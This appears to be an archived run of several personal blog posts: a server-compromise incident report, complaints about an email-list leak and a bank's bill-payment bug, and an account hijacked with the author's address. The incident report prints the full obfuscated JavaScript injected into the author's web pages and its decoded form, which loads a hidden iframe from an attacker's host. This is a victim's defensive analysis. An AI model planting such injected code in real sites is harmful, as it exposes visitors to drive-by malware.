• Banana Triangle
• Birdbrains
• Dog Eat Doug
• F Minus
• Ink Pen
• Luann
• The Other Coast
• Overboard
• Pluggers
• Rubes
• Scary Gary
• Strange Brew

Enjoy!

P.S. If you find the aggregator useful, please consider making a donation. Thanks!

Here’s my response: http://blog.kamens.us/jew-is-not-a-bad-word/.

(Background: One of the web sites, an old Drupal installation, handles scheduled tasks through a cron job that periodically fetches the URL /cron.php on the site. Each time /cron.php is fetched, Drupal checks if any scheduled tasks came due since the last time it was fetched, and executes the PHP code for those tasks. The scheduled tasks aren’t actually supposed to generate any output, so the cron job that fetches /cron.php shouldn’t generate any output and therefore shouldn’t cause cron to send email.)

All the sudden, the cron job that fetches /cron.php started sending me email every time that it ran. When I looked closely, I saw that the contents of the email were some strange, totally incomprehensible JavaScript fragment. I was incredibly busy, so although I thought it was curious that this should suddenly start happening, I didn’t immediately give much thought to it. After it had been stewing in the back of my mind for a couple of hours, however, I suddenly realized with a start that some script kiddie had almost certainly broken into the server and added malicious JavaScript to its pages, so I had no choice but to stop what I was doing and clean up the mess.

It turned out that two Drupal files, /index.php and /includes/bootstrap.inc, had indeed had malicious JavaScript appended to the end of them:

<script>b=new function(){return 2;};if(!+b)String.prototype.test=”harC”;for(i in $=’esrhserh’)if(i==’te’+'st’)m=$[i];try{new Object().wehweh();}catch(q){ss=”";}try{window['e'+'v'+'al'](‘asdas’)}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd=”e”;if({}.asd===’e')a=document['c'+'r'+'e'+'a'+'t'+'e'+'T'+'e'+'x'+'t'+'N'+'o'+'d'+'e'](’321′);if(a.data==321)t=-1*(d-d2);n=[-t+7,-t+7,-t+103,-t+100,-t+30,-t+38,-t+98,-t+109,-t+97,-t+115,-t+107,-t+99,-t+108,-t+114,-t+44,-t+101,-t+99,-t+114,-t+67,-t+106,-t+99,-t+107,-t+99,-t+108,-t+114,-t+113,-t+64,-t+119,-t+82,-t+95,-t+101,-t+76,-t+95,-t+107,-t+99,-t+38,-t+37,-t+96,-t+109,-t+98,-t+119,-t+37,-t+39,-t+89,-t+46,-t+91,-t+39,-t+121,-t+7,-t+7,-t+7,-t+103,-t+100,-t+112,-t+95,-t+107,-t+99,-t+112,-t+38,-t+39,-t+57,-t+7,-t+7,-t+123,-t+30,-t+99,-t+106,-t+113,-t+99,-t+30,-t+121,-t+7,-t+7,-t+7,-t+98,-t+109,-t+97,-t+115,-t+107,-t+99,-t+108,-t+114,-t+44,-t+117,-t+112,-t+103,-t+114,-t+99,-t+38,-t+32,-t+58,-t+103,-t+100,-t+112,-t+95,-t+107,-t+99,-t+30,-t+113,-t+112,-t+97,-t+59,-t+37,-t+102,-t+114,-t+114,-t+110,-t+56,-t+45,-t+45,-t+101,-t+109,-t+109,-t+101,-t+106,-t+99,-t+97,-t+102,-t+99,-t+97,-t+105,-t+44,-t+97,-t+120,-t+44,-t+97,-t+97,-t+45,-t+103,-t+108,-t+98,-t+99,-t+118,-t+44,-t+110,-t+102,-t+110,-t+61,-t+114,-t+110,-t+59,-t+99,-t+55,-t+51,-t+55,-t+47,-t+49,-t+55,-t+99,-t+53,-t+100,-t+52,-t+46,-t+47,-t+48,-t+52,-t+50,-t+37,-t+30,-t+117,-t+103,-t+98,-t+114,-t+102,-t+59,-t+37,-t+47,-t+46,-t+37,-t+30,-t+102,-t+99,-t+103,-t+101,-t+102,-t+114,-t+59,-t+37,-t+47,-t+46,-t+37,-t+30,-t+113,-t+114,-t+119,-t+106,-t+99,-t+59,-t+37,-t+116,-t+103,-t+113,-t+103,-t+96,-t+103,-t+106,-t+103,-t+114,-t+119,-t+56,-t+102,-t+103,-t+98,-t+98,-t+99,-t+108,-t+57,-t+110,-t+109,-t+113,-t+103,-t+114,-t+103,-t+109,-t+108,-t+56,-t+95,-t+96,-t+113,-t+109,-t+106,-t+115,-t+114,-t+99,-t+57,-t+106,-t+99,-t+100,-t+114,-t+56,-t+46,-t+57,-t+114,-t+109,-t+110,-t+56,-t+46,-t+57,-t+37,-t+60,-t+58,-t+45,-t+103,-t+100,-t+112,-t+95,-t+107,-t+99,-t+60,-t+32,-t+39,-t+57,-t+7,-t+7,-t+123,-t+7,-t+7,-t+100,-t+115,-t+108,-t+97,-t+114,-t+103,-t+109,-t+108,-t+30,-t+103,-t+100,-t+112,-t+95,-t+107,-t+99,-t+112,-t+38,-t+39,-t+121,-t+7,-t+7,-t+7,-t+116,-t+95,-t+112,-t+30,-t+100,-t+30,-t+59,-t+30,-t+98,-t+109,-t+97,-t+115,-t+107,-t+99,-t+108,-t+114,-t+44,-t+97,-t+112,-t+99,-t+95,-t+114,-t+99,-t+67,-t+106,-t+99,-t+107,-t+99,-t+108,-t+114,-t+38,-t+37,-t+103,-t+100,-t+112,-t+95,-t+107,-t+99,-t+37,-t+39,-t+57,-t+100,-t+44,-t+113,-t+99,-t+114,-t+63,-t+114,-t+114,-t+112,-t+103,-t+96,-t+115,-t+114,-t+99,-t+38,-t+37,-t+113,-t+112,-t+97,-t+37,-t+42,-t+37,-t+102,-t+114,-t+114,-t+110,-t+56,-t+45,-t+45,-t+101,-t+109,-t+109,-t+101,-t+106,-t+99,-t+97,-t+102,-t+99,-t+97,-t+105,-t+44,-t+97,-t+120,-t+44,-t+97,-t+97,-t+45,-t+103,-t+108,-t+98,-t+99,-t+118,-t+44,-t+110,-t+102,-t+110,-t+61,-t+114,-t+110,-t+59,-t+99,-t+55,-t+51,-t+55,-t+47,-t+49,-t+55,-t+99,-t+53,-t+100,-t+52,-t+46,-t+47,-t+48,-t+52,-t+50,-t+37,-t+39,-t+57,-t+100,-t+44,-t+113,-t+114,-t+119,-t+106,-t+99,-t+44,-t+116,-t+103,-t+113,-t+103,-t+96,-t+103,-t+106,-t+103,-t+114,-t+119,-t+59,-t+37,-t+102,-t+103,-t+98,-t+98,-t+99,-t+108,-t+37,-t+57,-t+100,-t+44,-t+113,-t+114,-t+119,-t+106,-t+99,-t+44,-t+110,-t+109,-t+113,-t+103,-t+114,-t+103,-t+109,-t+108,-t+59,-t+37,-t+95,-t+96,-t+113,-t+109,-t+106,-t+115,-t+114,-t+99,-t+37,-t+57,-t+100,-t+44,-t+113,-t+114,-t+119,-t+106,-t+99,-t+44,-t+106,-t+99,-t+100,-t+114,-t+59,-t+37,-t+46,-t+37,-t+57,-t+100,-t+44,-t+113,-t+114,-t+119,-t+106,-t+99,-t+44,-t+114,-t+109,-t+110,-t+59,-t+37,-t+46,-t+37,-t+57,-t+100,-t+44,-t+113,-t+99,-t+114,-t+63,-t+114,-t+114,-t+112,-t+103,-t+96,-t+115,-t+114,-t+99,-t+38,-t+37,-t+117,-t+103,-t+98,-t+114,-t+102,-t+37,-t+42,-t+37,-t+47,-t+46,-t+37,-t+39,-t+57,-t+100,-t+44,-t+113,-t+99,-t+114,-t+63,-t+114,-t+114,-t+112,-t+103,-t+96,-t+115,-t+114,-t+99,-t+38,-t+37,-t+102,-t+99,-t+103,-t+101,-t+102,-t+114,-t+37,-t+42,-t+37,-t+47,-t+46,-t+37,-t+39,-t+57,-t+7,-t+7,-t+7,-t+98,-t+109,-t+97,-t+115,-t+107,-t+99,-t+108,-t+114,-t+44,-t+101,-t+99,-t+114,-t+67,-t+106,-t+99,-t+107,-t+99,-t+108,-t+114,-t+113,-t+64,-t+119,-t+82,-t+95,-t+101,-t+76,-t+95,-t+107,-t+99,-t+38,-t+37,-t+96,-t+109,-t+98,-t+119,-t+37,-t+39,-t+89,-t+46,-t+91,-t+44,-t+95,-t+110,-t+110,-t+99,-t+108,-t+98,-t+65,-t+102,-t+103,-t+106,-t+98,-t+38,-t+100,-t+39,-t+57,-t+7,-t+7,-t+123];for(i=0;i<n.length;i++)ss+=s(eval(“n”+”["+"i]“));eval(ss);</script>

Since this Drupal site is hardly used nowadays and hasn’t been updated in a long time, my first guess was that somebody had found a way to take advantage of an old Drupal bug to modify files within the site’s filesystem hierarchy. However, the thing I couldn’t immediately explain was that neither the modified files nor the directory they lived in were writable by the “apache” user which which owns the web server processes. I said to myself, “Either I’m missing something, or whoever did this had root access to my server.” Since I was still incredibly busy, I decided at least for the time being to be optimistic and assume the former because the latter was sure to turn out to be a much bigger pain to deal with. Therefore, I restored the unhacked versions of the files, changed the ownership of all the files in the hierarchy to root, removed write access from the entire hierarchy to everyone, and got on with my day. This was a mistake.

Shortly after, when I was just about to leave the house to go to curriculum night at my kids’ school, I noticed an email message in my inbox saying that another web site I host, an actively maintained MediaWiki site, was reporting an internal server error when people tried to access it. Since it’s unlikely that the current MediaWiki version would have an unpatched security bug being actively exploited, and even more unlikely that an attacker would exploit separate Drupal and MediaWiki bugs to gain access to a server, it was immediately obvious that someone had, in fact, broken into my server, and I was in for a long night. In the time I had available, all I could do was shut down the web server processes so my server wouldn’t be serving malicious content onto the web; the next few hours were not my most attentive curriculum night.

Here’s an overview of what I discovered when I performed a full investigation and mitigation:

• The MediaWiki files that were modified, with the same JavaScript, were /index.php and /includes/Title.php.
• My SSH daemon as well as a number of other SSH executables were replaced. I think the new version which ignored /etc/hosts.deny and had a backdoor to allow root access without going through PAM.
• Several other web sites I host were hacked with the same JavaScript:
• /index.php and /wp-feed.php on my WordPress blog
• /charter.html and /index.html on a raw-HTML web site
• /index.php on a CMS Made Simple web site
• /index.html in the root directory for the default web site (i.e., /var/www/html/index.html on the server filesystem)
• /index.php and /includes/footer.php on a currently unused and out-of-date Joomla! web site
• Here’s what the obfuscated JavaScript shown above tries to execute:

  if (document.getElementsByTagName('body')[0]) {
      iframer();
  }
  else  {
      document.write("");
  }
  function iframer() {
      var f = document.createElement('iframe');
      f.setAttribute('src','http://googlecheck.cz.cc/index.php?tp=e959139e7f601264');
      f.style.visibility='hidden';
      f.style.position='absolute';
      f.style.left='0';
      f.style.top='0';
      f.setAttribute('width','10');
      f.setAttribute('height','10');
      document.getElementsByTagName('body')[0].appendChild(f);
  }

• Google Chrome is smart enough to detect and warn about this malicious JavaScript. Firefox isn’t. I didn’t try any other browsers.

Additional details about what was changed are included below. I saved copies of all of the modified executables and most of the modified web site files, so if you work in internet security by vocation or avocation and feel like disassembling some hacked SSH binaries to see what makes them tick, let me know.

Unfortunately, I can’t say exactly how the hacker broke into my server. It’s possible that he took advantage of an unpatched security hole in my virtual machine, but it’s also possible that he broke into the physical server hosting it, because my VM runs on a VPS infrastructure, in which anyone who with access to the host server has access to all of the processes and files owned by the individual VPSes.

In addition to restoring all of the modified web site files and executables (I ran a complete audit with “rpm –verify -a” as well as comparing the whole filesystem to its previous night’s backup from before the break-in), I took the following steps to (I hope) protect my server against future incursions:

• I updated a whole bunch of RPMs on my appliance (full list below), many of which no doubt contained security fixes.
• I fixed the configuration of yum-updatesd so that it will (at least I hope it will; I will follow up later to make certain) notify me promptly when future updates are available. I already had it running but configured to send notifications via dbus rather than email, which didn’t do any good because I never log into the VPS on a graphical console. Shame on me for not making sure this was working properly before.
• I reset all of the passwords for accounts that had passwords (accounts whose only access is via SSH public-key authentication do not have passwords).
• I changed my own account password not only on my server, but also everywhere else where I used the same password.

More details about the method and content of the attack

Some interesting log entries from /var/log/secure around when the break-in happened:

Sep 15 12:28:20 jik3 sshd[3188]: Connection closed by 63.223.110.54
Sep 15 12:37:32 jik3 sshd[1408]: Received signal 15; terminating.
Sep 15 12:37:33 jik3 sshd[16375]: Server listening on 0.0.0.0 port 22.
Sep 15 12:37:55 jik3 sshd[16388]: reverse mapping checking getaddrinfo for lesli.krystledeangeloweb.net [63.223.110.54] failed - POSSIBLE BREAK-IN ATTEMPT!
Sep 15 12:38:01 jik3 sshd[16435]: pam_unix(sshd:session): session opened for user root by (uid=0)
Sep 15 14:06:53 jik3 sshd[27758]: reverse mapping checking getaddrinfo for lesli.krystledeangeloweb.net [63.223.110.54] failed - POSSIBLE BREAK-IN ATTEMPT!
Sep 15 14:06:58 jik3 sshd[27890]: pam_unix(sshd:session): session opened for user root by (uid=0)
Sep 15 14:07:48 jik3 sshd[28345]: reverse mapping checking getaddrinfo for 154-168-221-83.stream.uz [83.221.168.154] failed - POSSIBLE BREAK-IN ATTEMPT!
Sep 15 14:08:10 jik3 sshd[28527]: pam_unix(sshd:session): session opened for user root by (uid=0)
Sep 15 14:09:14 jik3 sshd[28926]: reverse mapping checking getaddrinfo for 154-168-221-83.stream.uz [83.221.168.154] failed - POSSIBLE BREAK-IN ATTEMPT!
Sep 15 14:09:15 jik3 sshd[28929]: pam_unix(sshd:session): session opened for user root by (uid=0)
Sep 15 14:11:32 jik3 sshd[29832]: reverse mapping checking getaddrinfo for 154-168-221-83.stream.uz [83.221.168.154] failed - POSSIBLE BREAK-IN ATTEMPT!
Sep 15 14:11:34 jik3 sshd[29834]: pam_unix(sshd:session): session opened for user root by (uid=0)

I reviewed all of my logs, and this is the only trace I found of the attack (there didn’t even seem to be anything left behind in /root/.bash_profile, although I suppose it’s possible that I accidentally erased it). My best educated guess is that the first log line above is a hint that the attacker used a bug in sshd or one of the libraries it links against, probably a buffer overflow or something like that, to gain access to the server. The second and third lines are when the attacker restarted his version of /usr/sbin/sshd. The subsequent lines are him logging in through the modified sshd.

It’s worth noting that I have a monitor running on my box which notifies me about abnormal syslog messages on a minute-by-minute basis 24×7, but all of the messages above are considered normal so I wasn’t notified them. I would have been notified if sshd had logged “Accepted publickey|password for root from IP-address-that-I-don’t-usually-use,” but alas the hacker’s version of sshd suppressed this log message.

The following SSH executables were all modified at 12:36pm:

• /usr/sbin/sshd
• /usr/bin/ssh-keygen
• /usr/bin/scp
• /usr/bin/sftp
• /usr/bin/ssh
• /usr/bin/ssh-add
• /usr/bin/ssh-agent
• /usr/bin/ssh-keygen
• /usr/bin/ssh-keyscan

In addition, the files /usr/libexec/sftp-server and /usr/libexec/ssh-keysign, and/usr/share/Ssh.bin were added. The latter was a 600-byte file containing unidentified binary data. The “file” utility claims that it is a “DBase 3 data file (507582464 records),” which is obviously totally bogus.

Also, a bunch of man pages were added in /usr/share/man: man1/scp.1, man1/sftp.1, man1/slogin.1, man1/ssh-add.1, man1/ssh-agent.1, man1/ssh-keygen.1, man1/ssh-keyscan.1, man1/ssh.1, man5/ssh_config.5, man5/sshd_config.5, man8/sftp-server.8, man8/ssh-keysign.8, and man8/sshd.8. I must admit that it was very considerate for the attacker to include man pages for the binaries he installed! *rimshot*

Full list of updated RPMs

Perhaps somebody who follows security patching more closely than I do nowadays can look at this and tell me which of the old RPMs on my server was the attack vector.

I’ve reset the password on the account to prevent him from using it, but I can’t log into the account to see what profile information he specified or what he did on the site, because the site provides no way to recover a lost username. I’ve contacted webmaster@mozilla.com and asked them to provide me with the username as well as information from their logs about who created this account.

They’re a bit more likely to be willing to help then Skype, given that (a) they’re a collaborative, open-source organization and (b) I have an ongoing relationship with Mozilla, having submitted several core and Thunderbird patches and been nominated as a “Friend of the Tree”.

I’ve asked them at the very least, if they’re unwilling or unable to provide me with the username, to delete the account, since I don’t want accounts created by other people using my email address on sites all over the internet.

I have been in conversation about this with a high-level employee at Brave New Foundation, and I am now able to report the following important information:

• Brave New Foundation does not sell, share or rent their email lists.
• There is a Brave New Foundation employee with access to their lists who has a relative who works for Nation of Change.
• Brave New Foundation believes that this Nation of Change employee made unauthorized use of his/her relative’s access to copy an as yet undetermined subset of Brave New Foundation’s email lists for Nation of Change’s use.
• Brave New Foundation does not believe its employee was complicit in this unauthorized access. In fact, s/he was unaware that it had occurred until I brought it to Brave New Foundation’s attention.
• Brave New Foundation considers this breach of their data to be extremely serious, and they are actively investigating it.
• Brave New Foundation is considering legal action against Nation of Change both to prevent any further use of the copied email addresses and to obtain financial compensation for the damage to Brave New Foundation’s reputation and the time and resources spend investigating this incident.

All of this information, as well as some additional off-the-record supporting information that I cannot report here, was provided to me directly by an employee of Brave New Foundation. I have no reason to believe that employee is lying, and what s/he told me is consistent with my suspicions and impressions about Nation of Change. However, in the spirit of full disclosure, I want to be clear that I have not seen any hard evidence supporting any of Brave New Foundation’s allegations against Nation of Change.

When you combine these new allegations against Nation of Change with all the other issues I raised in my first posting about them, it seems doubtful that this is an organization which deserves anyone’s support.

I asked a lot of questions about Nation of Change, and thus far they’ve failed to respond to any of them. Here’s what has happened instead.

In response to my complaint, a representative of Nation of Change informed me, “I was unable to find your address: [elided] in our system.” I sent back a reply in which I included the entire header of the spam from Nation of Change, showing clearly that they had sent email to that address. They did not respond.

Much more significantly, several days later I received a “Thank you for Signing Up!” email sent to the same tagged email address from a different progressive web site, CommonDreams.org. When I complained to them, they claimed that someone had entered the address into the subscription form on their web site.

This is certainly not coincidence. It looks very much to me like whoever is behind the unauthorized transfer of a list of email addresses from Brave New Foundation to Nation of Change is trying to cover their tracks by making it look like I’m lying about the privacy of the email address in question. Either that, or they’re just being vindictive and trying to make my life difficult because I exposed their actions.

In the meantime, however, I have yet another bit of Citizens Bank lunacy to report.

While transitioning from our Citizens checking account to our Century account, I canceled a number of online bill payments on the Citizens Bank web site and recreated those payments from my Century account. One of those canceled payments was my monthly payment to my Citizens MasterCard.

The Citizens Bank web site actually shows my MasterCard account as one of my Citizens Bank accounts, so theoretically I could make payments by using the “Transfers” tab on the web site instead of the “Pay Bills” tab. However, because I don’t entirely trust the bank not to screw up such transfers for reasons which aren’t worth going into here, and for consistency with all my other monthly payments, I usually pay the credit card through “Pay Bills”, and that has always worked fine in the past.

It turns out that the Citizens Bank web site is “smart” about payments to a Citizens Bank card scheduled through “Pay Bills”. Although the payment shows up in the bill payment section of the web site, in the back end it is handled as a transfer.

How do I know this? Because although the web site gets this right when you create such a payment, it apparently gets it wrong when you cancel one. The payment disappears from your list of pending payments, but this is left behind in your list of pending transfers:

(click for full-size image)

If this were a normal transfer, there would be links under “Edit” and “Delete” which I could click to edit or delete it. But this transfer isn’t normal… it was created automatically by the web site’s back-end code, and so I can’t do anything about it.

I obviously don’t want my credit card bill to be paid twice, so I need to make this transfer go away. So I sent Citizens Bank this message through their web site:

I canceled this payment and it should not be showing up as a pending transfer. There’s no button for me to cancel it, so something is clearly wrong. THERE WILL NOT BE ENOUGH MONEY IN MY ACCOUNT TO COVER THIS TRANSFER ON AUGUST 16, so you’d better fix whatever program is causing this transfer to keep showing up even though I’ve canceled it!

Here’s the useless answer which I just got back from them:

Thank you for your recent email regarding a pending transfer to your credit card. Please note our records indicate this transaction was not scheduled through the online banking “Transfers” feature. In the event you have scheduled this payment through the credit card website please log in to your credit card account to cancel the transaction. You may also contact the number below for assistance.

I just sent them the following response:

I already explained this to you. Let me try again.

No, I didn’t schedule it through “Transfers”. I scheduled it through “Pay Bills”.

Your computers decided to convert the bill payment into a transfer. Then when I canceled the bill payment, your computers decide not to properly cancel the corresponding transfer that YOUR COMPUTERS CREATED.

Please don’t blow me off. THIS IS YOUR FAULT AND YOU NEED TO FIX IT.

I will be REALLY, REALLY PISSED OFF if you fail to fix this and the transfer goes through despite the fact that I canceled it and contacted you well in advance of the scheduled transfer date to notify you about the problem and ask you to fix it.

THERE IS A PROBLEM WITH YOUR COMPUTERS. Please forward this to someone who can actually do something about it. Do NOT send me another message blowing me off and telling me it’s not your fault. IT IS YOUR FAULT.

It’s bad that the QA they do on their web site is so feeble that either nobody ever tested this use case, or worse, they tested it and decided it was OK to allow this bug to make it into production. It’s even worse that their customer service staff is too stupid or poorly trained to recognize when the web site is broken and escalate the issue to someone who can do something about it.

I guess I’ll just have to make the issue moot by withdrawing all my money from the account and closing it before August 16.

I suspect that in addition to the ones I know about, this individual is probably also doing things that I don’t know about, because I assume that not all the web sites at which he’s using my address are kind enough to send me an email address alerting me to what he’s doing.

Today, however, I did get a notification from one site that I didn’t know about before — he apparently signed up for a Skype account using my email address. They emailed me about it because he attempted to purchase Skype credit but didn’t complete the transaction.

I immediately took advantage of Skype’s password recovery feature to reset the password on the account. I.e., I stole the account from the identity thief, just as I did when he signed up for a gmail account using my email address.

Then I sent this message to Skype’s customer support department. I don’t honestly expect them to respond in any useful way, but I figured it was worth a try:

As described at http://blog.kamens.us/?p=2258, someone I do not know has been going to various sites all over the internet and interacting with those sites using my email address, jik@kamens.brookline.ma.us. The things that I am aware of before today are (a) submitting a bizarre support request to Starwood hotels customer service and (b) creating a gmail account with my email address specified as its password recovery address. I am worried that whoever this person is may have used my email address at other sites as well, but these are the ones I know about.

Today, a new one occurred — this individual signed up for a skype account with the skype name bouba.diallo30 and using my email address. I received an email address notifying me of this fact because this individual apparently attempted to purchase a Skype credit but did not complete the transaction.

Because I obviously do not want people on the Internet impersonating me or using my email address for nefarious purposes, I used your password recovery feature to reset the password on this account so that it is one that I know and the identity thief does not. This is why I am currently writing to you from that account — I have taken over the account, which I think is perfectly legitimate since it was created using my email address and whoever created it is obviously up to no good. (I did the same thing to the gmail account that the thief created using my email address as its password recovery address.)

I would like your help tracking down whoever this person is. I don’t know what the hell he’s up to, but I’m really concerned that it’s something that’s going to hurt me, and I’m trying to collect as much information as possible about what’s going on so that I will be armed and ready if I need to escalate the fight against whatever this person is doing.

Can you please tell me how I can go about getting whatever additional information about this individual, e.g., what IP address was used to create the account, exactly when it was created, etc., i.e., anything at all you have logged about this person’s actions?

Please note that I am *very* careful with the security of my computer, home network and web accounts, and it is extremely unlikely that whoever is doing this has actually taken over my computer or email account or anything like that.

Thank you in advance for any help you can provide.

Sincerely,

Jonathan Kamens (the *real* jik@kamens.brookline.ma.us, as you can see from the jonathan.kamens Skype account which I’ve had associated with that email address for several years)

Interestingly, here are the profile details that the identity thief specified when creating the Skype account:

I wish I knew what the hell this guy thinks he’s accomplishing with these hijinks.

UPDATE: Because the author of “Basic Instructions” sometimes publishes his strip after people have already read their daily comics, I’ve also added “Basic Instructions (1-day delay)”, so you can use that one instead if you want to be sure not to miss one!